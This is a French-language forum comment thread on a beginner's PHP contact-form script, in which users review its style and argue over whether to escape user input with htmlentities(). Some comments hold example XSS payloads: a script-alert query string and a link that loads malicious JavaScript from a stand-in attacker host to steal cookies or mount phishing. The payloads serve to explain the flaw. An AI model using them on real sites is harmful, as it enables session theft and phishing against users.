cs_GRenard
Messages postés1662Date d'inscriptionlundi 16 septembre 2002StatutMembreDernière intervention30 juillet 2008
-
22 juil. 2004 à 18:49
mickadevelop
Messages postés55Date d'inscriptionmardi 15 février 2005StatutMembreDernière intervention 4 juin 2010
-
26 juin 2007 à 21:40
Cette discussion concerne un article du site. Pour la consulter dans son contexte d'origine, cliquez sur le lien ci-dessous.
mickadevelop
Messages postés55Date d'inscriptionmardi 15 février 2005StatutMembreDernière intervention 4 juin 2010 26 juin 2007 à 21:40
Ok je n'avais pas pensé a ce cas de figure. Merci et donc en conclusion il faut filtrer le html(avec htmlentites)toutes les variables demandé à l'utilisateur et que l'on affiche au format html!!!!!
winwarrior
Messages postés654Date d'inscriptionjeudi 3 avril 2003StatutMembreDernière intervention10 février 20091 26 juin 2007 à 19:30
mickadevelop
Messages postés55Date d'inscriptionmardi 15 février 2005StatutMembreDernière intervention 4 juin 2010 26 juin 2007 à 16:35
Oui je suis entierement d'accord avec toi qu'il ne faut pas laisser le javascript actif!! mais ce raisonnement n'a de valeur uniquement si un internaute malveillant mes un codes javascript sur une pages que d'autres interanutes peuvent consulter (par exemple dans un forum). Pour le cas qui est exposé au dessus on va afficher les variables saisies par l'utilisateur temporairement sur la page et il n'y aura uniquement que l'internaute qui les aura saisies qui sera concerné par ces variables. En conséquence si il rentre du javascript il ne pourra uniquement que lire ces propres cookies ou ce rediriger que lui meme vers une autre page web. Les conséquences ne seront valable uniquement que pour l'internaute qui a saisie les variable. Donnez moi votre avis sur ce raisonnement?
winwarrior
Messages postés654Date d'inscriptionjeudi 3 avril 2003StatutMembreDernière intervention10 février 20091 26 juin 2007 à 02:10
Combiné avec du social engineering (la victime devra cliquer sur le lien),
Un hacker pourrait mettre (par exemple) un code javascript qui lui enverrait le cookie de la victime sur ce domaine, ou ouvrirait une nouvelle fenetre avec une fausse identification ebay ou paypal (fishing) etc.. on peut presque tout faire en javascript
Donc non, ça ne sert pas à rien =)
mickadevelop
Messages postés55Date d'inscriptionmardi 15 février 2005StatutMembreDernière intervention 4 juin 2010 25 juin 2007 à 23:36
salut, ca sert à rien de mettre htmlentities() puisque si il met des balises html elle ne seront actives que pour l'utilisateur (donc que pour le mec qui les met) si il a envi d'avoir des merdes sur ca page c'est sont probleme. J'aimerais avoir votre avis sur ce sujet peut etre n'ai- je pas pensé à une faille de securité lié à du javascripte ou autre merci :)
Mascotte_Alex
Messages postés20Date d'inscriptionsamedi 25 novembre 2006StatutMembreDernière intervention22 juin 2007 7 avril 2007 à 23:18
Bonsoir, malheureusement les infos ne sont pas envoyées de mon coté
Sauriez vous pourquoi alors que j'ai bien modifier les infos concernant :
// Sujet du mail et adresse de déstination
$recipient = "dos-santos-alex@hotmail.fr";
Merci d'avance Bonne soirée
jonathan724
Messages postés35Date d'inscriptiondimanche 14 août 2005StatutMembreDernière intervention 4 juin 2007 22 févr. 2006 à 17:29
Bizard quand j' essaye d' accéder au fichier formulaire j' obtion le message suivant :
Parse error: parse error, unexpected T_IF in /home/goldfree/www/formulaire.php on line 17
si quelqu' un pourrait m' aider ! Merci
cs_gabi77
Messages postés4Date d'inscriptiondimanche 15 février 2004StatutMembreDernière intervention11 avril 2006 30 juil. 2004 à 13:04
Bonjour
Le script est un début, je vais bientot le modifier d'après tous vos commentaire cela ma aidé a approfondir mais connaissance. Donc voila et merci à tous les commentaires ci-dessus.
Cordialement gabi77
cs_Anthomicro
Messages postés9433Date d'inscriptionmardi 9 octobre 2001StatutMembreDernière intervention13 avril 20078 23 juil. 2004 à 19:59
Salut ;-)
alternative à la gestion d'erreur via un switch : htmlentities() Comme ça les caractères html sont affichés et non interprétés par le navigateur.
Bye
cs_minta
Messages postés31Date d'inscriptionsamedi 1 février 2003StatutMembreDernière intervention 1 mai 2022 23 juil. 2004 à 16:18
Ce commentaire s'adresse à GRenard, j'aimerais recevoir ton commentaire sur la source que tu trouveras à l'adresse suivante:
cs_chris81
Messages postés589Date d'inscriptionjeudi 2 octobre 2003StatutMembreDernière intervention29 avril 20082 23 juil. 2004 à 07:24
salut,
sympa ton code par contre je crois qu'a un moment pour la gestion des champ vide tu ecrase ta reponse au fur et a mesure.
winwarrior
Messages postés654Date d'inscriptionjeudi 3 avril 2003StatutMembreDernière intervention10 février 20091 23 juil. 2004 à 00:04
Pas mal mais pas sécurisé, "formulaire.php?ERRMSG=<script>alert();</script>"
à ta place j'utiliserai "switch()" pour filtrer les erreur
"formulaire.php?ERRMSG=1" etc ..
Sinon, meme avis que GRenard pour les endif et le exit
Bonne continuation.
cs_GRenard
Messages postés1662Date d'inscriptionlundi 16 septembre 2002StatutMembreDernière intervention30 juillet 20081 22 juil. 2004 à 18:49
Pas mal pour un débutant par contre, c'est pas beau utiliser des endif :P mais bon tu fais comme tu veux
L'utilisation de ton exit à la fin de ton fichier result.php est a proscrire...
Même si sur les sites de php ils te disent de faire ca, ce n'est pas une bonne idée...
En plus, tu es à la fin de ton fichier, c'est completement inutile :P
26 juin 2007 à 21:40
26 juin 2007 à 19:30
(exemple: http://sitevulnerable.com/?variablePasSecurisée=<script src="http://siteduhacker.com/scriptMalveillant.js"></script>);
la victime en cliquant sur le lien (le hacker l'aura bien entendu camouflé) injectera dans sa propre page le code javascript du hacker
26 juin 2007 à 16:35
26 juin 2007 à 02:10
Un hacker pourrait mettre (par exemple) un code javascript qui lui enverrait le cookie de la victime sur ce domaine, ou ouvrirait une nouvelle fenetre avec une fausse identification ebay ou paypal (fishing) etc.. on peut presque tout faire en javascript
Donc non, ça ne sert pas à rien =)
25 juin 2007 à 23:36
7 avril 2007 à 23:18
Sauriez vous pourquoi alors que j'ai bien modifier les infos concernant :
// Sujet du mail et adresse de déstination
$recipient = "dos-santos-alex@hotmail.fr";
Merci d'avance Bonne soirée
22 févr. 2006 à 17:29
Parse error: parse error, unexpected T_IF in /home/goldfree/www/formulaire.php on line 17
si quelqu' un pourrait m' aider ! Merci
30 juil. 2004 à 13:04
Le script est un début, je vais bientot le modifier d'après tous vos commentaire cela ma aidé a approfondir mais connaissance. Donc voila et merci à tous les commentaires ci-dessus.
Cordialement gabi77
23 juil. 2004 à 19:59
alternative à la gestion d'erreur via un switch : htmlentities() Comme ça les caractères html sont affichés et non interprétés par le navigateur.
Bye
23 juil. 2004 à 16:18
<http://www.phpcs.com/code.aspx?ID=22503>
23 juil. 2004 à 07:24
sympa ton code par contre je crois qu'a un moment pour la gestion des champ vide tu ecrase ta reponse au fur et a mesure.
23 juil. 2004 à 00:04
à ta place j'utiliserai "switch()" pour filtrer les erreur
"formulaire.php?ERRMSG=1" etc ..
Sinon, meme avis que GRenard pour les endif et le exit
Bonne continuation.
22 juil. 2004 à 18:49
L'utilisation de ton exit à la fin de ton fichier result.php est a proscrire...
Même si sur les sites de php ils te disent de faire ca, ce n'est pas une bonne idée...
En plus, tu es à la fin de ton fichier, c'est completement inutile :P